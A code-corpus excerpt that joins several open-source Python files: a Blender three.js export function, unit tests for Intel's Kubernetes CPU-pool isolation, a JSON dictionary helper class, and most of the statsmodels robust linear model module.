"copy_textures": option_copy_textures
}
scene_text += generate_ascii_scene(data)
write_file(filepath, scene_text)
# #####################################################
# Main
# #####################################################
def save(operator, context, filepath = "",
option_flip_yz = True,
option_vertices = True,
option_vertices_truncate = False,
option_faces = True,
option_normals = True,
option_uv_coords = True,
option_materials = True,
option_colors = True,
option_bones = True,
option_skinning = True,
align_model = 0,
option_export_scene = False,
option_lights = False,
option_cameras = False,
option_scale = 1.0,
option_embed_meshes = True,
option_url_base_html = False,
option_copy_textures = False,
option_animation_morph = False,
option_animation_skeletal = False,
option_frame_step = 1,
option_all_meshes = True,
option_frame_index_as_time = False):
#print("URL TYPE", option_url_base_html)
filepath = ensure_extension(filepath, '.js')
scene = context.scene
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
if option_all_meshes:
sceneobjects = scene.objects
else:
sceneobjects = context.selected_objects
# objects are contained in scene and linked groups
objects = []
# get scene objects
for obj in sceneobjects:
objects.append(obj)
if option_export_scene:
geo_set = set()
embeds = {}
for object in objects:
if object.type == "MESH" and object.THREE_exportGeometry:
# create extra copy of geometry with applied modifiers
# (if they exist)
#if len(object.modifiers) > 0:
# name = object.name
# otherwise can share geometry
#else:
name = object.data.name
if name not in geo_set:
if option_embed_meshes:
text, model_string = generate_mesh_string([object], scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
False, # align_model
option_flip_yz,
option_scale,
False, # export_single_model
False, # option_copy_textures
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
embeds[object.data.name] = model_string
else:
fname = generate_mesh_filename(name, filepath)
export_mesh([object], scene,
fname,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
False, # align_model
option_flip_yz,
option_scale,
False, # export_single_model
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time)
geo_set.add(name)
export_scene(scene, filepath,
option_flip_yz,
option_colors,
option_lights,
option_cameras,
option_embed_meshes,
embeds,
option_url_base_html,
option_copy_textures)
else:
export_mesh(objects, scene, filepath,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
option_flip_yz,
option_scale,
True, # export_single_model
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time)
return {'FINISHED'}
| mit | 1,092,684,765,250,428,200 | 30.502408 | 165 | 0.52047 | false |
Intel-Corp/CPU-Manager-for-Kubernetes | tests/unit/test_isolate.py | 1 | 11645 | from intel import isolate, config
from unittest.mock import patch, MagicMock
import pytest
import os
EXCL_ONE = [
{
"pool": "exclusive",
"socket": "0",
"cl": "0,11",
"tasks": ["123"]
}
]
SHAR_ONE = [
{
"pool": "shared",
"socket": "0",
"cl": "4,15,5,16",
"tasks": ["123"]
}
]
INF_ONE = [
{
"pool": "infra",
"socket": "0",
"cl": "6,17,7,18,8,19",
"tasks": ["123"]
}
]
EXNI_ONE = [
{
"pool": "exclusive-non-isolcpus",
"socket": "0",
"cl": "9,20",
"tasks": ["123"]
}
]
FAKE_CONFIG = {
"exclusive": {
"0": {
"0,11": [],
"1,12": [],
"2,13": []
},
"1": {
"3,14": []
}
},
"shared": {
"0": {
"4,15,5,16": []
},
"1": {}
},
"infra": {
"0": {
"6,17,7,18,8,19": []
},
"1": {}
},
"exclusive-non-isolcpus": {
"0": {
"9,20": [],
"10,21": []
},
"1": {}
}
}
def return_config(conf):
c = FAKE_CONFIG
for item in conf:
c[item["pool"]][item["socket"]][item["cl"]] = item["tasks"]
return config.build_config(c)
class MockConfig(config.Config):
def __init__(self, conf):
self.cm_name = "fake-name"
self.owner = "fake-owner"
self.c_data = conf
def lock(self):
return
def unlock(self):
return
class MockProcess():
def __init__(self):
self.pid = 9
self.affinity = []
def cpu_affinity(self, cpus=None):
if not cpus:
return self.get_cpu_affinity()
else:
self.set_cpu_affinity(cpus)
def get_cpu_affinity(self):
return self._cpu_affin
def set_cpu_affinity(self, new_affin):
self._cpu_affin = new_affin
class MockChild():
def __init__(self):
self.name = "child"
self.terminate = "term"
def wait(self):
return
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
@patch('intel.k8s.delete_config_map',
MagicMock(return_value=''))
@patch('intel.config.Config.lock', MagicMock(return_value=''))
@patch('intel.config.Config.unlock', MagicMock(return_value=''))
def test_isolate_exclusive1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process', MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [0, 11]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive2():
p = MockProcess()
c = MockConfig(return_config(EXCL_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [1, 12]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive3():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id="1")
assert p.cpu_affinity() == [3, 14]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared2():
p = MockProcess()
c = MockConfig(return_config(SHAR_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra2():
p = MockProcess()
c = MockConfig(return_config(INF_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive_non_isolcpus2():
p = MockProcess()
c = MockConfig(return_config(EXNI_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive-non-isolcpus", False, "fake-cmd",
["fake-args"], "fake-namespaec",
socket_id=None)
assert p.cpu_affinity() == [10, 21]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_pool_not_exist():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(KeyError) as err:
isolate.isolate("fake-pool", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested pool fake-pool does not exist"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=0))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_n_cpus_lt_one():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(ValueError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested numbers of cores "\
"must be positive integer"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=5))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_not_enough_cpus():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Not enough free cpu lists "\
"in pool exclusive"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared_failure1():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id="1")
assert err is not None
assert err.value.args[0] == "No cpu lists in pool shared"
| apache-2.0 | -5,756,347,737,831,524,000 | 32.271429 | 77 | 0.576986 | false |
ondoheer/GOT-english | libraries/jsonDict.py | 4 | 1934 | __author__ = 'ondoheer'
class JSONDictionary(object):
"""Creates an dictionary Object that works with JSON structured
dictionaries it takes one such argument as an inialization parameter.
It adds extra dictionary functionalities like key seaching and
specific key value retrieval (no matters how nested or what kind
of object the value is)"""
dictionary = None
def __init__(self, dictionary):
'''initializes with a dictionary as argument'''
self.dictionary = dictionary
def listKeys(self, *args):
'''lists every key in the object,
it does not matter how nested it is'''
if len(args) < 1:
innerDict = self.dictionary
else:
innerDict = args[0]
dictKeys = []
for key, value in innerDict.iteritems():
try:
dictKeys.append(key)
except TypeError:
pass
try:
results = self.listKeys(value)
for result in results:
dictKeys.append(result)
except AttributeError:
pass
return dictKeys
def getKeyValue(self, keyToSearch, *args):
'''search all the tree for a specific dictionary,
there cannot be repeated keys in the object or you will
never know which one has been returned'''
if len(args) < 1:
dictionary = self.dictionary
else:
dictionary = args[0]
if keyToSearch in dictionary:
return dictionary[keyToSearch]
for key, value in dictionary.iteritems():
try:
item = self.getKeyValue(keyToSearch, value)
if item is not None:
return item
except:
pass
def findKey(self, keyToSearch):
'''Returns True if key in Object'''
return keyToSearch in self.listKeys()
| gpl-2.0 | -4,777,922,465,718,618,000 | 31.779661 | 73 | 0.574457 | false |
detrout/debian-statsmodels | statsmodels/robust/robust_linear_model.py | 27 | 25571 | """
Robust linear models with support for the M-estimators listed under
:ref:`norms <norms>`.
References
----------
PJ Huber. 'Robust Statistics' John Wiley and Sons, Inc., New York. 1981.
PJ Huber. 1973, 'The 1972 Wald Memorial Lectures: Robust Regression:
Asymptotics, Conjectures, and Monte Carlo.' The Annals of Statistics,
1.5, 799-821.
R Venables, B Ripley. 'Modern Applied Statistics in S' Springer, New York,
2002.
"""
from statsmodels.compat.python import string_types
import numpy as np
import scipy.stats as stats
from statsmodels.tools.decorators import (cache_readonly,
resettable_cache)
import statsmodels.regression.linear_model as lm
import statsmodels.robust.norms as norms
import statsmodels.robust.scale as scale
import statsmodels.base.model as base
import statsmodels.base.wrapper as wrap
from statsmodels.compat.numpy import np_matrix_rank
__all__ = ['RLM']
def _check_convergence(criterion, iteration, tol, maxiter):
return not (np.any(np.fabs(criterion[iteration] -
criterion[iteration-1]) > tol) and iteration < maxiter)
class RLM(base.LikelihoodModel):
__doc__ = """
Robust Linear Models
Estimate a robust linear model via iteratively reweighted least squares
given a robust criterion estimator.
%(params)s
M : statsmodels.robust.norms.RobustNorm, optional
The robust criterion function for downweighting outliers.
The current options are LeastSquares, HuberT, RamsayE, AndrewWave,
TrimmedMean, Hampel, and TukeyBiweight. The default is HuberT().
See statsmodels.robust.norms for more information.
%(extra_params)s
Notes
-----
**Attributes**
df_model : float
The degrees of freedom of the model. The number of regressors p less
one for the intercept. Note that the reported model degrees
of freedom does not count the intercept as a regressor, though
the model is assumed to have an intercept.
df_resid : float
The residual degrees of freedom. The number of observations n
less the number of regressors p. Note that here p does include
the intercept as using a degree of freedom.
endog : array
See above. Note that endog is a reference to the data so that if
data is already an array and it is changed, then `endog` changes
as well.
exog : array
See above. Note that endog is a reference to the data so that if
data is already an array and it is changed, then `endog` changes
as well.
M : statsmodels.robust.norms.RobustNorm
See above. Robust estimator instance instantiated.
nobs : float
The number of observations n
pinv_wexog : array
The pseudoinverse of the design / exogenous data array. Note that
RLM has no whiten method, so this is just the pseudo inverse of the
design.
normalized_cov_params : array
The p x p normalized covariance of the design / exogenous data.
This is approximately equal to (X.T X)^(-1)
Examples
---------
>>> import statsmodels.api as sm
>>> data = sm.datasets.stackloss.load()
>>> data.exog = sm.add_constant(data.exog)
>>> rlm_model = sm.RLM(data.endog, data.exog,
M=sm.robust.norms.HuberT())
>>> rlm_results = rlm_model.fit()
>>> rlm_results.params
array([ 0.82938433, 0.92606597, -0.12784672, -41.02649835])
>>> rlm_results.bse
array([ 0.11100521, 0.30293016, 0.12864961, 9.79189854])
>>> rlm_results_HC2 = rlm_model.fit(cov="H2")
>>> rlm_results_HC2.params
array([ 0.82938433, 0.92606597, -0.12784672, -41.02649835])
>>> rlm_results_HC2.bse
array([ 0.11945975, 0.32235497, 0.11796313, 9.08950419])
>>>
>>> rlm_hamp_hub = sm.RLM(data.endog, data.exog,
M=sm.robust.norms.Hampel()).fit(
sm.robust.scale.HuberScale())
>>> rlm_hamp_hub.params
array([ 0.73175452, 1.25082038, -0.14794399, -40.27122257])
""" % {'params' : base._model_params_doc,
'extra_params' : base._missing_param_doc}
def __init__(self, endog, exog, M=norms.HuberT(), missing='none',
**kwargs):
self.M = M
super(base.LikelihoodModel, self).__init__(endog, exog,
missing=missing, **kwargs)
self._initialize()
#things to remove_data
self._data_attr.extend(['weights', 'pinv_wexog'])
def _initialize(self):
"""
Initializes the model for the IRLS fit.
Resets the history and number of iterations.
"""
self.pinv_wexog = np.linalg.pinv(self.exog)
self.normalized_cov_params = np.dot(self.pinv_wexog,
np.transpose(self.pinv_wexog))
self.df_resid = (np.float(self.exog.shape[0] -
np_matrix_rank(self.exog)))
self.df_model = np.float(np_matrix_rank(self.exog)-1)
self.nobs = float(self.endog.shape[0])
def score(self, params):
raise NotImplementedError
def information(self, params):
raise NotImplementedError
def predict(self, params, exog=None):
"""
Return linear predicted values from a design matrix.
Parameters
----------
params : array-like, optional after fit has been called
Parameters of a linear model
exog : array-like, optional.
Design / exogenous data. Model exog is used if None.
Returns
-------
An array of fitted values
Notes
-----
If the model as not yet been fit, params is not optional.
"""
#copied from linear_model
if exog is None:
exog = self.exog
return np.dot(exog, params)
def loglike(self, params):
raise NotImplementedError
def deviance(self, tmp_results):
"""
Returns the (unnormalized) log-likelihood from the M estimator.
"""
return self.M((self.endog - tmp_results.fittedvalues) /
tmp_results.scale).sum()
def _update_history(self, tmp_results, history, conv):
history['params'].append(tmp_results.params)
history['scale'].append(tmp_results.scale)
if conv == 'dev':
history['deviance'].append(self.deviance(tmp_results))
elif conv == 'sresid':
history['sresid'].append(tmp_results.resid/tmp_results.scale)
elif conv == 'weights':
history['weights'].append(tmp_results.model.weights)
return history
def _estimate_scale(self, resid):
"""
Estimates the scale based on the option provided to the fit method.
"""
if isinstance(self.scale_est, str):
if self.scale_est.lower() == 'mad':
return scale.mad(resid, center=0)
if self.scale_est.lower() == 'stand_mad':
return scale.mad(resid)
else:
raise ValueError("Option %s for scale_est not understood" %
self.scale_est)
elif isinstance(self.scale_est, scale.HuberScale):
return self.scale_est(self.df_resid, self.nobs, resid)
else:
return scale.scale_est(self, resid)**2
def fit(self, maxiter=50, tol=1e-8, scale_est='mad', init=None, cov='H1',
update_scale=True, conv='dev'):
"""
Fits the model using iteratively reweighted least squares.
The IRLS routine runs until the specified objective converges to `tol`
or `maxiter` has been reached.
Parameters
----------
conv : string
Indicates the convergence criteria.
Available options are "coefs" (the coefficients), "weights" (the
weights in the iteration), "sresid" (the standardized residuals),
and "dev" (the un-normalized log-likelihood for the M
estimator). The default is "dev".
cov : string, optional
'H1', 'H2', or 'H3'
Indicates how the covariance matrix is estimated. Default is 'H1'.
See rlm.RLMResults for more information.
init : string
Specifies method for the initial estimates of the parameters.
Default is None, which means that the least squares estimate
is used. Currently it is the only available choice.
maxiter : int
The maximum number of iterations to try. Default is 50.
scale_est : string or HuberScale()
'mad' or HuberScale()
Indicates the estimate to use for scaling the weights in the IRLS.
The default is 'mad' (median absolute deviation. Other options are
'HuberScale' for Huber's proposal 2. Huber's proposal 2 has
optional keyword arguments d, tol, and maxiter for specifying the
tuning constant, the convergence tolerance, and the maximum number
of iterations. See statsmodels.robust.scale for more information.
tol : float
The convergence tolerance of the estimate. Default is 1e-8.
update_scale : Bool
If `update_scale` is False then the scale estimate for the
weights is held constant over the iteration. Otherwise, it
is updated for each fit in the iteration. Default is True.
Returns
-------
results : object
statsmodels.rlm.RLMresults
"""
if not cov.upper() in ["H1","H2","H3"]:
raise ValueError("Covariance matrix %s not understood" % cov)
else:
self.cov = cov.upper()
conv = conv.lower()
if not conv in ["weights","coefs","dev","sresid"]:
raise ValueError("Convergence argument %s not understood" \
% conv)
self.scale_est = scale_est
if (isinstance(scale_est,
string_types) and scale_est.lower() == "stand_mad"):
from warnings import warn
warn("stand_mad is deprecated and will be removed in 0.7.0",
FutureWarning)
wls_results = lm.WLS(self.endog, self.exog).fit()
if not init:
self.scale = self._estimate_scale(wls_results.resid)
history = dict(params = [np.inf], scale = [])
if conv == 'coefs':
criterion = history['params']
elif conv == 'dev':
history.update(dict(deviance = [np.inf]))
criterion = history['deviance']
elif conv == 'sresid':
history.update(dict(sresid = [np.inf]))
criterion = history['sresid']
elif conv == 'weights':
history.update(dict(weights = [np.inf]))
criterion = history['weights']
# done one iteration so update
history = self._update_history(wls_results, history, conv)
iteration = 1
converged = 0
while not converged:
self.weights = self.M.weights(wls_results.resid/self.scale)
wls_results = lm.WLS(self.endog, self.exog,
weights=self.weights).fit()
if update_scale is True:
self.scale = self._estimate_scale(wls_results.resid)
history = self._update_history(wls_results, history, conv)
iteration += 1
converged = _check_convergence(criterion, iteration, tol, maxiter)
results = RLMResults(self, wls_results.params,
self.normalized_cov_params, self.scale)
history['iteration'] = iteration
results.fit_history = history
results.fit_options = dict(cov=cov.upper(), scale_est=scale_est,
norm=self.M.__class__.__name__, conv=conv)
#norm is not changed in fit, no old state
#doing the next causes exception
#self.cov = self.scale_est = None #reset for additional fits
#iteration and history could contain wrong state with repeated fit
return RLMResultsWrapper(results)
class RLMResults(base.LikelihoodModelResults):
"""
Class to contain RLM results
Returns
-------
**Attributes**
bcov_scaled : array
p x p scaled covariance matrix specified in the model fit method.
The default is H1. H1 is defined as
``k**2 * (1/df_resid*sum(M.psi(sresid)**2)*scale**2)/
((1/nobs*sum(M.psi_deriv(sresid)))**2) * (X.T X)^(-1)``
where ``k = 1 + (df_model +1)/nobs * var_psiprime/m**2``
where ``m = mean(M.psi_deriv(sresid))`` and
``var_psiprime = var(M.psi_deriv(sresid))``
H2 is defined as
``k * (1/df_resid) * sum(M.psi(sresid)**2) *scale**2/
((1/nobs)*sum(M.psi_deriv(sresid)))*W_inv``
H3 is defined as
``1/k * (1/df_resid * sum(M.psi(sresid)**2)*scale**2 *
(W_inv X.T X W_inv))``
where `k` is defined as above and
``W_inv = (M.psi_deriv(sresid) exog.T exog)^(-1)``
See the technical documentation for cleaner formulae.
bcov_unscaled : array
The usual p x p covariance matrix with scale set equal to 1. It
is then just equivalent to normalized_cov_params.
bse : array
An array of the standard errors of the parameters. The standard
errors are taken from the robust covariance matrix specified in the
argument to fit.
chisq : array
An array of the chi-squared values of the paramter estimates.
df_model
See RLM.df_model
df_resid
See RLM.df_resid
fit_history : dict
Contains information about the iterations. Its keys are `deviance`,
`params`, `iteration` and the convergence criteria specified in
`RLM.fit`, if different from `deviance` or `params`.
fit_options : dict
Contains the options given to fit.
fittedvalues : array
The linear predicted values. dot(exog, params)
model : statsmodels.rlm.RLM
A reference to the model instance
nobs : float
The number of observations n
normalized_cov_params : array
See RLM.normalized_cov_params
params : array
The coefficients of the fitted model
pinv_wexog : array
See RLM.pinv_wexog
pvalues : array
The p values associated with `tvalues`. Note that `tvalues` are assumed to be distributed
standard normal rather than Student's t.
resid : array
The residuals of the fitted model. endog - fittedvalues
scale : float
The type of scale is determined in the arguments to the fit method in
RLM. The reported scale is taken from the residuals of the weighted
least squares in the last IRLS iteration if update_scale is True. If
update_scale is False, then it is the scale given by the first OLS
fit before the IRLS iterations.
sresid : array
The scaled residuals.
tvalues : array
The "t-statistics" of params. These are defined as params/bse where bse are taken
from the robust covariance matrix specified in the argument to fit.
weights : array
The reported weights are determined by passing the scaled residuals
from the last weighted least squares fit in the IRLS algortihm.
See also
--------
statsmodels.model.LikelihoodModelResults
"""
def __init__(self, model, params, normalized_cov_params, scale):
super(RLMResults, self).__init__(model, params,
normalized_cov_params, scale)
self.model = model
self.df_model = model.df_model
self.df_resid = model.df_resid
self.nobs = model.nobs
self._cache = resettable_cache()
#for remove_data
self.data_in_cache = ['sresid']
self.cov_params_default = self.bcov_scaled
#TODO: "pvals" should come from chisq on bse?
@cache_readonly
def fittedvalues(self):
return np.dot(self.model.exog, self.params)
@cache_readonly
def resid(self):
return self.model.endog - self.fittedvalues # before bcov
@cache_readonly
def sresid(self):
return self.resid/self.scale
@cache_readonly
def bcov_unscaled(self):
return self.normalized_cov_params
@cache_readonly
def weights(self):
return self.model.weights
@cache_readonly
def bcov_scaled(self):
model = self.model
m = np.mean(model.M.psi_deriv(self.sresid))
var_psiprime = np.var(model.M.psi_deriv(self.sresid))
k = 1 + (self.df_model+1)/self.nobs * var_psiprime/m**2
if model.cov == "H1":
return k**2 * (1/self.df_resid*\
np.sum(model.M.psi(self.sresid)**2)*self.scale**2)\
/((1/self.nobs*np.sum(model.M.psi_deriv(self.sresid)))**2)\
*model.normalized_cov_params
else:
W = np.dot(model.M.psi_deriv(self.sresid)*model.exog.T,
model.exog)
W_inv = np.linalg.inv(W)
# [W_jk]^-1 = [SUM(psi_deriv(Sr_i)*x_ij*x_jk)]^-1
# where Sr are the standardized residuals
if model.cov == "H2":
# These are correct, based on Huber (1973) 8.13
return k*(1/self.df_resid)*np.sum(\
model.M.psi(self.sresid)**2)*self.scale**2\
/((1/self.nobs)*np.sum(\
model.M.psi_deriv(self.sresid)))*W_inv
elif model.cov == "H3":
return k**-1*1/self.df_resid*np.sum(\
model.M.psi(self.sresid)**2)*self.scale**2\
*np.dot(np.dot(W_inv, np.dot(model.exog.T,model.exog)),\
W_inv)
@cache_readonly
def pvalues(self):
return stats.norm.sf(np.abs(self.tvalues))*2
@cache_readonly
def bse(self):
return np.sqrt(np.diag(self.bcov_scaled))
@cache_readonly
def chisq(self):
return (self.params/self.bse)**2
def remove_data(self):
super(self.__class__, self).remove_data()
#self.model.history['sresid'] = None
#self.model.history['weights'] = None
remove_data.__doc__ = base.LikelihoodModelResults.remove_data.__doc__
def summary(self, yname=None, xname=None, title=0, alpha=.05,
return_fmt='text'):
"""
This is for testing the new summary setup
"""
from statsmodels.iolib.summary import (summary_top,
summary_params, summary_return)
## left = [(i, None) for i in (
## 'Dependent Variable:',
## 'Model type:',
## 'Method:',
## 'Date:',
## 'Time:',
## 'Number of Obs:',
## 'df resid',
## 'df model',
## )]
top_left = [('Dep. Variable:', None),
('Model:', None),
('Method:', ['IRLS']),
('Norm:', [self.fit_options['norm']]),
('Scale Est.:', [self.fit_options['scale_est']]),
('Cov Type:', [self.fit_options['cov']]),
('Date:', None),
('Time:', None),
('No. Iterations:', ["%d" % self.fit_history['iteration']])
]
top_right = [('No. Observations:', None),
('Df Residuals:', None),
('Df Model:', None)
]
if not title is None:
title = "Robust linear Model Regression Results"
#boiler plate
from statsmodels.iolib.summary import Summary
smry = Summary()
smry.add_table_2cols(self, gleft=top_left, gright=top_right, #[],
yname=yname, xname=xname, title=title)
smry.add_table_params(self, yname=yname, xname=xname, alpha=alpha,
use_t=self.use_t)
#diagnostic table is not used yet
# smry.add_table_2cols(self, gleft=diagn_left, gright=diagn_right,
# yname=yname, xname=xname,
# title="")
#add warnings/notes, added to text format only
etext =[]
wstr = \
'''If the model instance has been used for another fit with different fit
parameters, then the fit options might not be the correct ones anymore .'''
etext.append(wstr)
if etext:
smry.add_extra_txt(etext)
return smry
def summary2(self, xname=None, yname=None, title=None, alpha=.05,
float_format="%.4f"):
"""Experimental summary function for regression results
Parameters
-----------
xname : List of strings of length equal to the number of parameters
Names of the independent variables (optional)
yname : string
Name of the dependent variable (optional)
title : string, optional
Title for the top table. If not None, then this replaces the
default title
alpha : float
significance level for the confidence intervals
float_format: string
print format for floats in parameters summary
Returns
-------
smry : Summary instance
this holds the summary tables and text, which can be printed or
converted to various output formats.
See Also
--------
statsmodels.iolib.summary.Summary : class to hold summary
results
"""
# Summary
from statsmodels.iolib import summary2
smry = summary2.Summary()
smry.add_base(results=self, alpha=alpha, float_format=float_format,
xname=xname, yname=yname, title=title)
return smry
class RLMResultsWrapper(lm.RegressionResultsWrapper):
pass
wrap.populate_wrapper(RLMResultsWrapper, RLMResults)
if __name__=="__main__":
#NOTE: This is to be removed
#Delivery Time Data is taken from Montgomery and Peck
import statsmodels.api as sm
#delivery time(minutes)
endog = np.array([16.68, 11.50, 12.03, 14.88, 13.75, 18.11, 8.00, 17.83,
79.24, 21.50, 40.33, 21.00, 13.50, 19.75, 24.00, 29.00, 15.35, 19.00,
9.50, 35.10, 17.90, 52.32, 18.75, 19.83, 10.75])
#number of cases, distance (Feet)
exog = np.array([[7, 3, 3, 4, 6, 7, 2, 7, 30, 5, 16, 10, 4, 6, 9, 10, 6,
7, 3, 17, 10, 26, 9, 8, 4], [560, 220, 340, 80, 150, 330, 110, 210, 1460,
605, 688, 215, 255, 462, 448, 776, 200, 132, 36, 770, 140, 810, 450, 635,
150]])
exog = exog.T
exog = sm.add_constant(exog)
# model_ols = models.regression.OLS(endog, exog)
# results_ols = model_ols.fit()
# model_ramsaysE = RLM(endog, exog, M=norms.RamsayE())
# results_ramsaysE = model_ramsaysE.fit(update_scale=False)
# model_andrewWave = RLM(endog, exog, M=norms.AndrewWave())
# results_andrewWave = model_andrewWave.fit(update_scale=False)
# model_hampel = RLM(endog, exog, M=norms.Hampel(a=1.7,b=3.4,c=8.5)) # convergence problems with scale changed, not with 2,4,8 though?
# results_hampel = model_hampel.fit(update_scale=False)
#######################
### Stack Loss Data ###
#######################
from statsmodels.datasets.stackloss import load
data = load()
data.exog = sm.add_constant(data.exog)
#############
### Huber ###
#############
# m1_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
# results_Huber1 = m1_Huber.fit()
# m2_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
